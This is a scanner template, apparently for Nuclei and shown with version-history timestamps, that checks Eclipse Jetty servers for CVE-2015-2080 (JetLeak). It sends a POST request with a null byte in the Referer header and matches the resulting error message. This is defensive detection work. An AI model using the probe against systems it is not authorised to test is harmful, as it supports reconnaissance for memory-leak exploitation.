2021-03-06 14:06:03 +00:00
id : CVE-2015-2080
info :
2022-04-21 21:16:41 +00:00
name : Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage
2021-03-06 14:06:03 +00:00
author : pikpikcu
2021-09-10 11:26:40 +00:00
severity : high
2022-04-22 10:38:41 +00:00
description : Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.
2021-08-18 11:37:49 +00:00
reference :
2021-04-22 09:04:36 +00:00
- https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
2022-04-21 21:16:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-2080
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2015-2080
cwe-id : CWE-200
2022-04-21 21:16:41 +00:00
tags : cve,cve2015,jetty
2021-03-06 14:06:03 +00:00
requests :
- method : POST
path :
2021-08-02 07:23:35 +00:00
- "{{BaseURL}}"
2021-03-06 14:06:03 +00:00
headers :
2021-03-17 08:39:56 +00:00
Referer : \x00
2021-03-06 14:06:03 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 400
- type : word
words :
- "Illegal character 0x0 in state"
2021-03-07 11:19:03 +00:00
part : body
2022-04-21 21:16:41 +00:00
# Enhanced by mp on 2022/04/21